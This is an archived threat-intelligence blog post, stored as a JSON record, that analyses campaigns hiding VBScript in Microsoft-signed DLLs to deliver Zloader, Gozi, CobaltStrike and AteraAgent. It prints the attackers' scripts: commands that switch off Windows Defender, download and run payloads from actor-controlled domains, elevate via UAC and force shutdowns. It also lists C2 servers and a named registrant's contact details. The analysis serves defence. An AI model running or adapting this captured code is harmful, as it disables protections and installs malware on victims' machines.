{
	"id": "6b838f39-d8bb-41c8-9a19-7217023f4f59",
	"created_at": "2026-04-06T00:15:13.351147Z",
	"updated_at": "2026-04-10T03:21:53.617205Z",
	"deleted_at": null,
	"sha1_hash": "16a8646f36adaf01baff3f7e2dcdf543ea25b373",
	"title": "Signed DLL campaigns as a service",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1330780,
	"plain_text": "Signed DLL campaigns as a service\r\nBy Jason Reaves\r\nPublished: 2022-01-11 · Archived: 2026-04-05 22:52:03 UTC\r\n10 min read\r\nJan 11, 2022\r\nBy: Jason Reaves and Joshua Platt\r\nPress enter or click to view image in full size\r\nRecently an actor has begun using a technique of embedding VBScript data at the end of Microsoft signed DLLs\r\nin order to GPG decrypt and then detonate payloads. While writing up our research another article was released on\r\nthis by CheckPoint[7][8] but we felt there are enough pieces from our own research that can add to the story.\r\nThis concept has been talked about before using various files and is normally referred to as ‘Polyglotting’, for\r\nexample lnk files[2] and appending to PE files[1]. For these campaigns they used Microsoft signed DLLs and\r\nabused a code signing check bug in attempts to bypass security measures.\r\nhttps://medium.com/walmartglobaltech/signed-dll-campaigns-as-a-service-7760ac676489\r\nPage 1 of 16\n\nThe campaigns related to Zloader have also been previously discussed[3] so we will be focusing on going over the\r\nupdates and differences in the more recent campaigns.\r\nCampaign\r\nThe campaign has multiple components but the idea is to ultimately detonate malware, the malware payloads we\r\nwent over include the following:\r\nAterAgent RAT\r\nZloader\r\nGozi\r\nCobaltStrike\r\nAs previously mentioned in the SentinelOne[3] article these campaigns still begin with fake installers, for the\r\nmore recent campaigns we investigated they were using AdvancedInstaller to create the packages which would\r\nthen kick off the detonation process of various components.\r\nPress enter or click to view image in full size\r\nThe follow up components will handle various setup functionality such as setting up exclusions for msiexec using\r\nVBScript code appended to Microsoft signed binaries:\r\n\u003cscript LANGUAGE=\"VBScript\"\u003e\r\nSet WshShell = CreateObject (\"WScript.Shell\")\r\nWshShell.run \"cmd.exe /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command\r\nWshShell.run \"cmd.exe /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command\r\nWshShell.run \"cmd.exe /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command\r\nWshShell.run \"cmd.exe /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command\r\nWshShell.run \"cmd.exe /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command\r\nWshShell.run \"cmd.exe /c powershell.exe -command Set-MpPreference -MAPSReporting 0\", 0\r\nhttps://medium.com/walmartglobaltech/signed-dll-campaigns-as-a-service-7760ac676489\r\nPage 2 of 16\n\nWshShell.run \"cmd.exe /c powershell.exe -command Add-MpPreference -ExclusionProcess 'regsvr32'\", 0\r\nWshShell.run \"cmd.exe /c powershell.exe -command Add-MpPreference -ExclusionProcess 'rundll32.exe'\",\r\nWshShell.run \"cmd.exe /c powershell.exe -command Add-MpPreference -ExclusionProcess 'rundll32*'\", 0\r\nWshShell.run \"cmd.exe /c powershell.exe -command Add-MpPreference -ExclusionExtension '.exe'\", 0\r\nWshShell.run \"cmd.exe /c powershell.exe -command Add-MpPreference -ExclusionProcess 'regsvr32*'\", 0\r\nWshShell.run \"cmd.exe /c powershell.exe -command Add-MpPreference -ExclusionProcess '.dll'\", 0\r\nWshShell.run \"cmd.exe /c powershell.exe -command Add-MpPreference -ExclusionProcess '*.dll'\", 0\r\nWshShell.run \"cmd.exe /c powershell.exe -command Set-MpPreference -PUAProtection disable\", 0\r\nWshShell.run \"cmd.exe /c powershell.exe -command Set-MpPreference -EnableControlledFolderAccess Disab\r\nWshShell.run \"cmd.exe /c powershell.exe -command Set-MpPreference -DisableRealtimeMonitoring $true\",\r\nWshShell.run \"cmd.exe /c powershell.exe -command Set-MpPreference -DisableBehaviorMonitoring $true\",\r\nWshShell.run \"cmd.exe /c powershell.exe -command Set-MpPreference -DisableIOAVProtection $true\", 0\r\nWshShell.run \"cmd.exe /c powershell.exe -command Set-MpPreference -DisablePrivacyMode $true\", 0\r\nWshShell.run \"cmd.exe /c powershell.exe -command Set-MpPreference -SignatureDisableUpdateOnStartupWit\r\nWshShell.run \"cmd.exe /c powershell.exe -command Set-MpPreference -DisableArchiveScanning $true\", 0\r\nWshShell.run \"cmd.exe /c powershell.exe -command Set-MpPreference -DisableIntrusionPreventionSystem $\r\nWshShell.run \"cmd.exe /c powershell.exe -command Set-MpPreference -DisableScriptScanning $true\", 0\r\nWshShell.run \"cmd.exe /c powershell.exe -command Set-MpPreference -SubmitSamplesConsent 2\", 0\r\nWshShell.run \"cmd.exe /c powershell.exe -command Add-MpPreference -ExclusionProcess '*.exe'\", 0\r\nWshShell.run \"cmd.exe /c powershell.exe -command Add-MpPreference -ExclusionProcess 'explorer.exe'\",\r\nWshShell.run \"cmd.exe /c powershell.exe -command Add-MpPreference -ExclusionProcess '.exe'\", 0\r\nWshShell.run \"cmd.exe /c powershell.exe -command Set-MpPreference -HighThreatDefaultAction 6 -Force\"\r\nWshShell.run \"cmd.exe /c powershell.exe -command Set-MpPreference -ModerateThreatDefaultAction 6\", 0\r\nWshShell.run \"cmd.exe /c powershell.exe -command Set-MpPreference -LowThreatDefaultAction 6\", 0\r\nWshShell.run \"cmd.exe /c powershell.exe -command Set-MpPreference -SevereThreatDefaultAction 6\", 0\r\nWshShell.run \"cmd.exe /c powershell.exe -command Set-MpPreference -ScanScheduleDay 8\", 0\r\nWshShell.run \"cmd.exe /c powershell.exe -command Add-MpPreference -ExclusionProcess 'msiexec.exe'\", 0\r\nwindow.close()\r\n\u003c/script\u003e\r\nAlong with installing GPG for powershell usage:\r\nfunction Install-GnuPg {\r\n \u003c#\r\n .SYNOPSIS\r\n This function installed the GnuPg for Windows application. It the installer file is not in\r\n the DownloadFolderPath, the function will download the file from the Internet and then execute a si\r\n .PARAMETER DownloadFolderPath\r\n The folder path where you'd like to download the GnuPg for Windows installer into.$uri = 'https://\r\n$moduleFolderPath = 'C:\\Program Files\\WindowsPowerShell\\Modules\\GnuPg'\r\n$null = New-Item -Path $moduleFolderPath -Type Directory\r\nInvoke-WebRequest -Uri $uri -OutFile (Join-Path -Path $moduleFolderPath -ChildPath 'GnuPg.psm1')\r\n$env:APPDATA\r\nInstall-GnuPG -DownloadFolderPath $env:APPDATA\r\necho \"START\"\r\nhttps://medium.com/walmartglobaltech/signed-dll-campaigns-as-a-service-7760ac676489\r\nPage 3 of 16\n\nThe script will also perform some interesting checks to determine the likelyhood of being in an enterprise\r\nenvironment:\r\n$MaxIPToSendRequest = 2$UserDomain = wmic computersystem get domain\r\n$UserDomain = $UserDomain[2]\r\n$UserDomain = $UserDomain.trim()$UserPCname = $env:computername\r\n$UserPCname = $UserPCname.trim()Write-Host 'UserDomain = '$UserDomain\r\nWrite-Host 'UserPCname = '$UserPCname$Condition001 = ($UserDomain -ne $UserPCname)\r\n$Condition002 = ($UserDomain -ne \"WORKGROUP\")$ArpInfo = arp -a$arr1 =$ArpInfo | select-string \"192.1\r\n $arr1_count= $arr1.length\r\n #Write-Output $arr1$arr2 =$ArpInfo | select-string \"10.(\\d{1,3}).\\d{1,3}(\\.\\d{1,3})(.)*(\\w\\w-\r\n $arr2_count= $arr2.length\r\n #Write-Output $arr2$arr3 =$ArpInfo | select-string \"172.(\\d{1,3}).\\d{1,3}(\\.\\d{1,3})(.)*(\\w\\w\r\n $arr3_count= $arr3.length\r\n #Write-Output $arr3\r\n $IP_count= $arr1_count + $arr2_count + $arr3_count\r\nWrite-Host 'IP_count =' $IP_count$Condition003 = ($IP_count -ge $MaxIPToSendRequest)$Condition_All =\r\nThese checks then determine which malware will be installed, if all the conditions are met and the script is likely\r\ninside an enterprise then for this instance it will install CobaltStrike and AteraAgent RAT, if not then it will install\r\nGozi or Zloader.\r\nif ($Condition_All )\r\n{\r\n $URL = \"https://cloudfiletehnology.com/z00m/index/processingSetRequestCoba/?servername=msi\u0026a\r\n Invoke-WebRequest https://cloudfiletehnology.com/z00m/index/processingSetRequestBat5/?servername=ms\r\n Invoke-WebRequest https://cloudfiletehnology.com/z00m/index/processingSetRequestBat6/?servername=ms\r\n Invoke-WebRequest $URL -outfile zoom2.dll.gpg\r\n Invoke-WebRequest https://cloudfiletehnology.com/z00m/index/processingSetRequestAtera/?servername=m\r\n}\r\nelse\r\n{\r\n$URL = \"https://cloudfiletehnology.com/z00m/index/processingSetRequestBot/?servername=msi\u0026arp=\"+ $IP_\r\n Invoke-WebRequest https://cloudfiletehnology.com/z00m/index/processingSetRequestBat5/?servername=ms\r\n Invoke-WebRequest https://cloudfiletehnology.com/z00m/index/processingSetRequestBat6/?servername=ms\r\n Invoke-WebRequest $URL -outfile zoom.dll.gpg\r\n}\r\nFrom here it begins leveraging multiple batch files in sequences to, but you may notice a number of DLL files are\r\nalso being downloaded, these DLL files are normally Microsoft signed DLLs with appended VBScript code.\r\nPE Polyglot Technique\r\nhttps://medium.com/walmartglobaltech/signed-dll-campaigns-as-a-service-7760ac676489\r\nPage 4 of 16\n\nSome of these abused DLLs have 0 detections on VirusTotal:\r\nPress enter or click to view image in full size\r\nScreenshot from VirusTotal\r\nIf we look into the data on the file however we can see VBScript code has been appended to the file:\r\n00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x0\r\nPrettier version of just the VBScript:\r\n\u003cscript LANGUAGE=\"VBScript\"\u003e\r\nSet WshShell = CreateObject (\"WScript.Shell\")\r\nSub Sleep (ms)\r\n Set fso = CreateObject(\"Scripting.FileSystemObject\")\r\n Dim sFilePath: sFilePath = fso.GetSpecialFolder(2) \u0026 \"\\WScriptSleeper.vbs\"\r\n If Not fso.FileExists(sFilePath) Then\r\n Set oFile = fso.CreateTextFile(sFilePath, True)\r\n oFile.Write \"wscript.sleep WScript.Arguments(0)\"\r\nhttps://medium.com/walmartglobaltech/signed-dll-campaigns-as-a-service-7760ac676489\r\nPage 5 of 16\n\noFile.Close\r\n End If\r\n Dim oShell: Set oShell = CreateObject(\"WScript.Shell\")\r\n oShell.Run sFilePath \u0026 \" \" \u0026 ms, 0, True\r\nEnd Sub\r\nSleep (45000)\r\nWshShell.run \"cmd.exe /c PowerShell -NoProfile -ExecutionPolicy Bypass -command Import-Module GnuPg;\r\nSleep (45000)\r\nWshShell.run \"cmd.exe /c zoom1.msi\", 0\r\nWshShell.run \"cmd.exe /c rundll32.exe zoom.dll DllRegisterServer\"\r\nWshShell.run \"cmd.exe /c mode.exe\", 0\r\nwindow.close()\r\n\u003c/script\u003e\r\nThis DLL is meant to be executed by ‘mshta.exe’ which will then decrypt and detonate files. The detonation piece\r\nwill involve the usage of batch files as previously mentioned, example:\r\ne3d7f1af2bc790cf143827d2335b594dc3d54a0f49cb61e0b8d6a2d1f0ad27cb\r\ncd %APPDATA%\r\n start /b cmd /c C:\\Windows\\System32\\mshta.exe %APPDATA%\\appContast.dll\r\n start /b cmd /c C:\\Windows\\System32\\mshta.exe %APPDATA%\\apiicontrast.dll\r\n powershell Invoke-WebRequest https://commandaadmin.com/adminpriv.exe -OutFile adminpriv.exe\r\n adminpriv -U:T -ShowWindowMode:Hide reg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\UX\r\n adminpriv -U:T -ShowWindowMode:Hide reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Polic\r\n adminpriv -U:T -ShowWindowMode:Hide reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Polic\r\n adminpriv -U:T -ShowWindowMode:Hide reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Polic\r\n adminpriv -U:T -ShowWindowMode:Hide reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Polic\r\n powershell.exe -command \"Add-MpPreference -ExclusionExtension \".bat\"\"\r\n adminpriv -U:T -ShowWindowMode:Hide bcdedit /set {default} recoveryenabled No\r\n adminpriv -U:T -ShowWindowMode:Hide bcdedit /set {default} bootstatuspolicy ignoreallfailures\r\n adminpriv -U:T sc config WinDefend start= disabled\r\n ping 127.0.0.1 -n 50 \u003e nul\r\n powershell Invoke-WebRequest https://commandaadmin.com/reboos.dll -OutFile reboos.dll\r\n cd %USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\r\n powershell Invoke-WebRequest https://commandaadmin.com/auto.bat -OutFile auto.bat\r\n powershell.exe New-ItemProperty -Path HKLM:Software\\Microsoft\\Windows\\CurrentVersion\\policies\\sys\r\n shutdown\r\n shutdown /s /f /t 01\r\n shutdown /s /f /t 00\r\n shutdown /s /f\r\nFor this instance adminpriv is Nsudo[4] and reboos.dll is for detonating a separate DLL using the same trick with\r\nmshta.exe:\r\nhttps://medium.com/walmartglobaltech/signed-dll-campaigns-as-a-service-7760ac676489\r\nPage 6 of 16\n\n\u003cscript LANGUAGE=\"VBScript\"\u003e\r\nSet WshShell = CreateObject (\"WScript.Shell\")\r\nWshShell.run \"cmd.exe /c rundll32.exe zoom2.dll DllRegisterServer\", 0\r\nWshShell.run \"cmd.exe /c regsvr32 zoom.dll\", 0\r\nwindow.close()\r\n\u003c/script\u003e\r\nThe downloaded batch file `auto.bat` from above will leverage adminpriv which we mentioned is NSude[4]:\r\nadminpriv -U:T -ShowWindowMode:Hide sc delete windefend\r\nIt will also execute other vbs code which also lines up with the previous work done by SentinelOne:\r\n:UACPrompt\r\n echo Set UAC = CreateObject^(\"Shell.Application\"^) \u003e \"%temp%\\getadmin.vbs\"\r\n set params = %*:\"=\"\r\n echo UAC.ShellExecute \"cmd.exe\", \"/c %~s0 %params%\", \"\", \"runas\", 0 \u003e\u003e \"%temp%\\getadmin.vbs\"\"%tem\r\n del \"%temp%\\getadmin.vbs\"\r\n exit /B\r\nAnd finally we can see it detonate the code appended to the DLL using mshta:\r\nstart /b cmd /c C:\\Windows\\System32\\mshta.exe %APPDATA%\\apiicontrast.dll\r\nThe zoom file as it turns out for this instance is an AteraAgent installer:\r\nGet Jason Reaves’s stories in your inbox\r\nJoin Medium for free to get updates from this writer.\r\nRemember me for faster sign in\r\nb6280ee7d58b89b0951f08aabe64f1780887bf360e8a725e4269675398ebad65\r\nPlushkinloder9@yandex.ru\r\nThe email associated with the Atera installer was also used for a domain registration:\r\nRegistry Registrant ID: reg-a6r6lkbkoh64\r\nRegistrant Name: Alexey Samoylov\r\nRegistrant Organization: Private Person\r\nRegistrant Street: sadovaya 14\r\nRegistrant City: oktyaborskiy\r\nhttps://medium.com/walmartglobaltech/signed-dll-campaigns-as-a-service-7760ac676489\r\nPage 7 of 16\n\nRegistrant State/Province: Ulyanovskaya\r\nRegistrant Postal Code: 433407\r\nRegistrant Country: RU\r\nRegistrant Phone: +7.9260229351\r\nRegistrant Phone Ext:\r\nRegistrant Fax:\r\nRegistrant Fax Ext:\r\nRegistrant Email: plushkinloder9@yandex.ru\r\nRegistry Admin ID: reg-zsnzthxfekkq\r\nAdmin Name: Alexey Samoylov\r\nAdmin Organization: Private Person\r\nAdmin Street: sadovaya 14\r\nAdmin City: oktyaborskiy\r\nAdmin State/Province: Ulyanovskaya\r\nAdmin Postal Code: 433407\r\nAdmin Country: RU\r\nAdmin Phone: +7.9260229351\r\nAdmin Phone Ext:\r\nAdmin Fax: +7.9260229351\r\nAdmin Fax Ext:\r\nAdmin Email: plushkinloder9@yandex.ru\r\nRegistry Tech ID: reg-v8bnf870ivb6\r\nTech Name: Alexey Samoylov\r\nTech Organization: Private Person\r\nTech Street: sadovaya 14\r\nTech City: oktyaborskiy\r\nTech State/Province: Ulyanovskaya\r\nTech Postal Code: 433407\r\nTech Country: RU\r\nTech Phone: +7.9260229351\r\nTech Phone Ext:\r\nTech Fax: +7.9260229351\r\nTech Fax Ext:\r\nTech Email: plushkinloder9@yandex.ru\r\nAtleast one campaign server was still online during our research from December campaigns:\r\nPress enter or click to view image in full size\r\nhttps://medium.com/walmartglobaltech/signed-dll-campaigns-as-a-service-7760ac676489\r\nPage 8 of 16\n\nInstaller campaign panel login\r\nThis is a sold service and can be linked to a crew we have previously discussed, ConfCrew[6].\r\nCampaign stats\r\nCampaigns began in May 2021 and go through December 2021:\r\nInfections by month in 2021\r\nThe infections are primarily located in the US and Europe but do cover a wide range of places geographically:\r\nhttps://medium.com/walmartglobaltech/signed-dll-campaigns-as-a-service-7760ac676489\r\nPage 9 of 16\n\nInfections by geolocation\r\nMalware Config Extraction\r\nThe Zloader is the newer version, the config is simply encrypted with RC4 using a hardcoded key which was\r\nmentioned in the article by Hasherezade previously[5]. We can abuse the NULL values in the internal\r\nconfiguration along with some basic knowledge of RC4 encryption to find the internal config after we first find\r\nthe key:\r\nconfig_key = re.findall('[a-z]{20,}', data)\r\nAfter finding the key we can find the encrypted config by looking for 16 bytes chunks from the 256 byte SBOX,\r\nthis would tell us the general area where the encrypted config is which then makes this a bruteable problem.\r\n if len(config_key) \u003e 0:\r\n #Find possible key\r\n key = config_key[0]\r\n #Because ARC4 is a reoccuring sbox of 256 bytes\r\n #We can possible find the encrypted config by looking for any 16 byte\r\n # sequence from a null encrypted block\r\n temp = '\\x00'*256\r\n rc4 = ARC4.new(key)\r\n needle = rc4.encrypt(temp)\r\n offsets = []\r\nhttps://medium.com/walmartglobaltech/signed-dll-campaigns-as-a-service-7760ac676489\r\nPage 10 of 16\n\nfor i in range(256/16):\r\n if needle[i*16:(i+1)*16] in data:\r\n offsets.append(data.find(needle[i*16:(i+1)*16]))\r\n if len(offsets) \u003e 0:\r\n #Take first occurrence\r\n off = min(offsets)\r\n #Create bruteable space\r\n blob = data[off-(1024*4):off+(1024*4)]\r\nNow we just brute until we find a known plaintext string:\r\n for i in range(len(blob)):\r\n rc4 = ARC4.new(key)\r\n test = rc4.decrypt(blob[i:])\r\n if 'http://' in test or 'https://' in test:\r\n print(\"Found it\")\r\n print(test)\r\n break\r\nZloader internal config:\r\nCAMPAIGN: vasja\r\nC2: https://iqowijsdakm.com/gate.php\r\nhttps://wiewjdmkfjn.com/gate.php\r\nhttps://dksaoidiakjd.com/gate.php\r\nhttps://iweuiqjdakjd.com/gate.php\r\nhttps://yuidskadjna.com/gate.php\r\nhttps://olksmadnbdj.com/gate.php\r\nhttps://odsakmdfnbs.com/gate.php\r\nhttps://odsakjmdnhsaj.com/gate.php\r\nhttps://odjdnhsaj.com/gate.php\r\nhttps://odoishsaj.com/gate.php\r\nC2_KEY: 03d5ae30a0bd934a23b6a7f0756aa504\r\nAnd pivoting on the C2 key we can find lots of campaigns by this actor:\r\nCAMPAIGN: personal\r\nC2: https://iqowijsdakm.com/gate.php\r\nhttps://wiewjdmkfjn.com/gate.php\r\nhttps://dksaoidiakjd.com/gate.php\r\nhttps://iweuiqjdakjd.com/gate.php\r\nhttps://yuidskadjna.com/gate.php\r\nhttps://olksmadnbdj.com/gate.php\r\nhttps://medium.com/walmartglobaltech/signed-dll-campaigns-as-a-service-7760ac676489\r\nPage 11 of 16\n\nhttps://odsakmdfnbs.com/gate.php\r\nhttps://odsakjmdnhsaj.com/gate.php\r\nhttps://odjdnhsaj.com/gate.php\r\nhttps://odoishsaj.com/gate.php\r\nC2_KEY: 03d5ae30a0bd934a23b6a7f0756aa504\r\nCAMPAIGN: googleaktualizacija\r\nC2: https://iqowijsdakm.com/gate.php\r\nhttps://wiewjdmkfjn.com/gate.php\r\nhttps://dksaoidiakjd.com/gate.php\r\nhttps://iweuiqjdakjd.com/gate.php\r\nhttps://yuidskadjna.com/gate.php\r\nhttps://olksmadnbdj.com/gate.php\r\nhttps://odsakmdfnbs.com/gate.php\r\nhttps://odsakjmdnhsaj.com/gate.php\r\nhttps://odjdnhsaj.com/gate.php\r\nhttps://odoishsaj.com/gate.php\r\nC2_KEY: 03d5ae30a0bd934a23b6a7f0756aa504\r\nCAMPAIGN: buldog\r\nC2: https://iqowijsdakm.com/gate.php\r\nhttps://wiewjdmkfjn.com/gate.php\r\nhttps://dksaoidiakjd.com/gate.php\r\nhttps://iweuiqjdakjd.com/gate.php\r\nhttps://yuidskadjna.com/gate.php\r\nhttps://olksmadnbdj.com/gate.php\r\nhttps://odsakmdfnbs.com/gate.php\r\nhttps://odsakjmdnhsaj.com/gate.php\r\nhttps://odjdnhsaj.com/gate.php\r\nhttps://odoishsaj.com/gate.php\r\nC2_KEY: 03d5ae30a0bd934a23b6a7f0756aa504\r\nCAMPAIGN: personal\r\nC2: https://iqowijsdakm.com/gate.php\r\nhttps://wiewjdmkfjn.com/gate.php\r\nhttps://dksaoidiakjd.com/gate.php\r\nhttps://iweuiqjdakjd.com/gate.php\r\nhttps://yuidskadjna.com/gate.php\r\nhttps://olksmadnbdj.com/gate.php\r\nhttps://odsakmdfnbs.com/gate.php\r\nhttps://odsakjmdnhsaj.com/gate.php\r\nhttps://odjdnhsaj.com/gate.php\r\nhttps://odoishsaj.com/gate.php\r\nC2_KEY: 03d5ae30a0bd934a23b6a7f0756aa504\r\nCAMPAIGN: 9092ge\r\nhttps://medium.com/walmartglobaltech/signed-dll-campaigns-as-a-service-7760ac676489\r\nPage 12 of 16\n\nC2: https://asdfghdsajkl.com/gate.php\r\nhttps://lkjhgfgsdshja.com/gate.php\r\nhttps://kjdhsasghjds.com/gate.php\r\nhttps://kdjwhqejqwij.com/gate.php\r\nhttps://iasudjghnasd.com/gate.php\r\nhttps://daksjuggdhwa.com/gate.php\r\nhttps://dkisuaggdjhna.com/gate.php\r\nhttps://eiqwuggejqw.com/gate.php\r\nhttps://dquggwjhdmq.com/gate.php\r\nhttps://djshggadasj.com/gate.php\r\nC2_KEY: 03d5ae30a0bd934a23b6a7f0756aa504\r\nCAMPAIGN: googleaktualizacija\r\nC2: https://iqowijsdakm.com/gate.php\r\nhttps://wiewjdmkfjn.com/gate.php\r\nhttps://dksaoidiakjd.com/gate.php\r\nhttps://iweuiqjdakjd.com/gate.php\r\nhttps://yuidskadjna.com/gate.php\r\nhttps://olksmadnbdj.com/gate.php\r\nhttps://odsakmdfnbs.com/gate.php\r\nhttps://odsakjmdnhsaj.com/gate.php\r\nhttps://odjdnhsaj.com/gate.php\r\nhttps://odoishsaj.com/gate.php\r\nC2_KEY: 03d5ae30a0bd934a23b6a7f0756aa504\r\nCAMPAIGN: tim\r\nC2: https://iqowijsdakm.com/gate.php\r\nhttps://wiewjdmkfjn.com/gate.php\r\nhttps://dksaoidiakjd.com/gate.php\r\nhttps://iweuiqjdakjd.com/gate.php\r\nhttps://yuidskadjna.com/gate.php\r\nhttps://olksmadnbdj.com/gate.php\r\nhttps://odsakmdfnbs.com/gate.php\r\nhttps://odsakjmdnhsaj.com/gate.php\r\nhttps://odjdnhsaj.com/gate.php\r\nhttps://odoishsaj.com/gate.php\r\nC2_KEY: 03d5ae30a0bd934a23b6a7f0756aa504\r\nCobaltStrike was also found to be leveraged by this actor for enterprise environments:\r\n{'SPAWNTO_X64': '%windir%\\\\sysnative\\\\dllhost.exe', 'SLEEPTIME': '45000', 'C2_VERB_GET': 'GET', 'Proc\r\nGozi:\r\nhttps://medium.com/walmartglobaltech/signed-dll-campaigns-as-a-service-7760ac676489\r\nPage 13 of 16\n\n{\r\n \"DLL_32\": {\r\n \"CONFIG_FAIL_TIMEOUT\": \"20\",\r\n \"VER\": \"131353\",\r\n \"UNKNOWN\": \"\",\r\n \"DGA_COUNT\": \"10\",\r\n \"TIMER\": \"0\",\r\n \"CRC_HOSTS\": \"google.mail.com firsone1.online kdsjdsadas.online\",\r\n \"CRC_URI_EXT\": \".bmp\",\r\n \"CRC_URI\": \"/jkloll/\",\r\n \"CRC_SERVERKEY\": \"01026655AALLKENM\",\r\n \"MD5\": \"1c362dcf0fe517a05952caf90ae1d992\",\r\n \"CRC_SERVER\": \"12\",\r\n \"IMPHASH\": \"0d41e840891676bdaee3e54973cf5a69\",\r\n \"PUB_KEY\": \"f9ccfec396940a0f3ba99d0043ae8c9a5df54fde98c1596c974533e2050fbd92623d802012d8c5f00\r\n \"SHA256\": \"5d80327decb188074a67137699e5fccdc3a8b296a931ddf20d37597cebb4d140\",\r\n \"CONF_TIMEOUT\": \"10\",\r\n \"CRC_GROUP\": \"9090\"\r\n }\r\n}\r\nIOCs\r\nInstaller system:\r\ncloudfiletehnology.com\r\nzoomdownloab.site\r\npornofilmspremium.com\r\ndatalystoy.com\r\ncmdadminu.com\r\nteambatfor.com\r\nclouds222.com\r\ncommandaadmin.com\r\nInstaller panel traffic Patterns:\r\n/processingSetRequestBat1/?servername=\r\n/processingSetRequestBat2/?servername=\r\n/processingSetRequestBat3/?servername=\r\n/processingSetRequestBat4/?servername=\r\n/processingSetRequestBat5/?servername=\r\n/processingSetRequestBat6/?servername=\r\n/processingSetRequestBot/?servername=\r\n/processingSetRequestCoba/?servername=\r\nhttps://medium.com/walmartglobaltech/signed-dll-campaigns-as-a-service-7760ac676489\r\nPage 14 of 16\n\n/processingSetRequestDownload/?servername=\r\n/processingSetRequestAtera/?servername=\r\nGozi:\r\nfirsone1.online\r\nkdsjdsadas.online\r\nZloader:\r\neiqwuggejqw.com\r\nyuidskadjna.com\r\niweuiqjdakjd.com\r\nodsakmdfnbs.com\r\nodjdnhsaj.com\r\ndjshggadasj.com\r\ndquggwjhdmq.com\r\nkjdhsasghjds.com\r\nlkjhgfgsdshja.com\r\niqowijsdakm.com\r\ndkisuaggdjhna.com\r\ndksaoidiakjd.com\r\niasudjghnasd.com\r\nodsakjmdnhsaj.com\r\nasdfghdsajkl.com\r\nwiewjdmkfjn.com\r\nolksmadnbdj.com\r\ndaksjuggdhwa.com\r\nkdjwhqejqwij.com\r\nodoishsaj.com\r\nCobaltStrike:\r\njersydok.com\r\nReferences\r\n1: http://blog.sevagas.com/?Hacking-around-HTA-files\r\n2: https://hatching.io/blog/lnk-hta-polyglot/\r\n3:https://www.sentinelone.com/labs/hide-and-seek-new-zloader-infection-chain-comes-with-improved-stealth-and-evasion-mechanisms/\r\n4:https://github.com/M2Team/NSudo\r\nhttps://medium.com/walmartglobaltech/signed-dll-campaigns-as-a-service-7760ac676489\r\nPage 15 of 16\n\n5:https://www.malwarebytes.com/resources/files/2020/05/the-silent-night-zloader-zbot_final.pdf\r\n6:https://www.sentinelone.com/labs/valak-malware-and-the-connection-to-gozi-loader-confcrew/\r\n7:https://research.checkpoint.com/2022/can-you-trust-a-files-digital-signature-new-zloader-campaign-exploits-microsofts-signature-verification-putting-users-at-risk/\r\n8:https://www.bleepingcomputer.com/news/security/microsoft-code-sign-check-bypassed-to-drop-zloader-malware/\r\nSource: https://medium.com/walmartglobaltech/signed-dll-campaigns-as-a-service-7760ac676489\r\nhttps://medium.com/walmartglobaltech/signed-dll-campaigns-as-a-service-7760ac676489\r\nPage 16 of 16",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://medium.com/walmartglobaltech/signed-dll-campaigns-as-a-service-7760ac676489"
	],
	"report_names": [
		"signed-dll-campaigns-as-a-service-7760ac676489"
	],
	"threat_actors": [],
	"ts_created_at": 1775434513,
	"ts_updated_at": 1775791313,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/16a8646f36adaf01baff3f7e2dcdf543ea25b373.pdf",
		"text": "https://archive.orkl.eu/16a8646f36adaf01baff3f7e2dcdf543ea25b373.txt",
		"img": "https://archive.orkl.eu/16a8646f36adaf01baff3f7e2dcdf543ea25b373.jpg"
	}
}